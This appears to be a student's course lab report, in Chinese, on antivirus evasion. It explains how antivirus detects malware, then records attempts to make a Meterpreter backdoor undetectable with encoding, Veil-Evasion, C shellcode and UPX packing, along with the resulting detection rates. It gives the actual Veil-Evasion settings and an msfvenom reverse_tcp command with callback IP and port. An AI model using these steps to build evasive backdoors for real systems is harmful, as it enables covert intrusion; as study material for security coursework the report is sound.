20154313 刘文亨 EXP3
· 20154313刘文亨博客园
· 首页
· 新随笔
· 联系
· 订阅
· 管理
随笔-3 文章-0 评论-0
Exp3 免杀原理与实践
一、基础问题回答
(1)杀软是如何检测出恶意代码的?
· -检测特征码:
老师上课说过,每次网络传输或者其他过程,都会有包(tcp或者其他),这些包里的内容可被检测。如果其中有某一行代码含有特征码-即这段病毒程序的特定标志?我是这么理解的,就可以被查出来。这个是一个很精准的,但是存在滞后,因为病毒库要更新。
· -基于行为检测:
看这个程序或者代码是干什么的,如果是乱穿你的文件等等,那基本就是病毒。不过也不一定,有误差。
· -启发式检测类似:
这个感觉有点类似是自我学习然后发现病毒?我是这么理解的。
(2)免杀是做什么?
使恶意软件不被AV检测出来
(3)免杀的基本方法有哪些?
·
-改变特征码:
·
· 依靠分片等方法尝试找出特征码区域,并对该区域代码进行编码。
·
加壳,使其无法进行逆向,比对病毒库中的特征码。
·
·
改变行为方式:
·
二、开始实验测试
1.原始版本
将上此实验产生的后门 lwh_backdoor.exe 文件直接拷贝到开启360的win主机下
直接被360逮到~~
添加信任以后放在 http://www.virscan.org/上扫描
48%的报毒率!!那些没查到的可能因为病毒太裸了吧~
接下来需要对其进行改装了
2.编码版本V1
先对后门木马编码1次,lwh-1.exe
48%的报毒率,没有任何变化????那就编码10次试试,lwh-10.exe
48%的报毒率??完全没什么用!
3.veil-evasion版本
Veil-Evasion是一个与Metasploit有点类似的软件,已经在kali虚拟机里,如果没有可以进行在线安装:sudo apt-get install veil-evasion(反正我没成功,用同学电脑做的)
在终端下输入指令veil-evasion即可打开软件,根据menu的提示依次键入以下指令:
use python/meterpreter/rev_tcp //设置payload
set LHOST 192.30.1.193 //设置反弹连接IP
set port 4313 //设置反弹端口4313
generate //生成
4313lwh//程序名
1
该可执行文件存在kali计算机的/var/lib/veil-evasion/output/compiled/文件夹里,点击places的fengjia即可找到相应的文件夹:(但是被辣鸡360检测出来了)
放到网站上扫描一下:
4.C语言调用Shellcode版本
在Kali下生成一个C语言格式的shellcode数组,回连的IP为Kali的IP,端口自定。
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.174.131 LPORT=4313 -f c(第一次做失败了,ip是130,第二次ip是131。截图是第一次的,不影响最终结果)
将shellcode字符串复制下来,然后在kaili中随便改一个文件的后缀为.c文件,打开修改这个文件为可运行。再将其转换成可执行文件.exe
将.c复制到windows中,编译运行,生成.exe文件。这时候kali用msf监听,并运行刚刚生成的.exe。成功回连。
找到exe可执行文件 lwh.exe,扫描一下
17%的报毒率,比前面的方法不知道高到哪里去了!感动!
5.C调用升级版本
加壳
压缩壳UPX
直接用upx将MSF直接生成的文件加壳。
报毒率反而上升了?这是什么情况!不太清楚!!
三、离实战还缺些什么技术或步骤?
四、实验心得与体会
这次实验做的比较头大,软件装了一天都装不好,这次实验主要还是用到了后门和回连,过程比较繁琐,但是还是没有做到百分百杀毒,希望在好好琢磨,研究一下杀毒软件。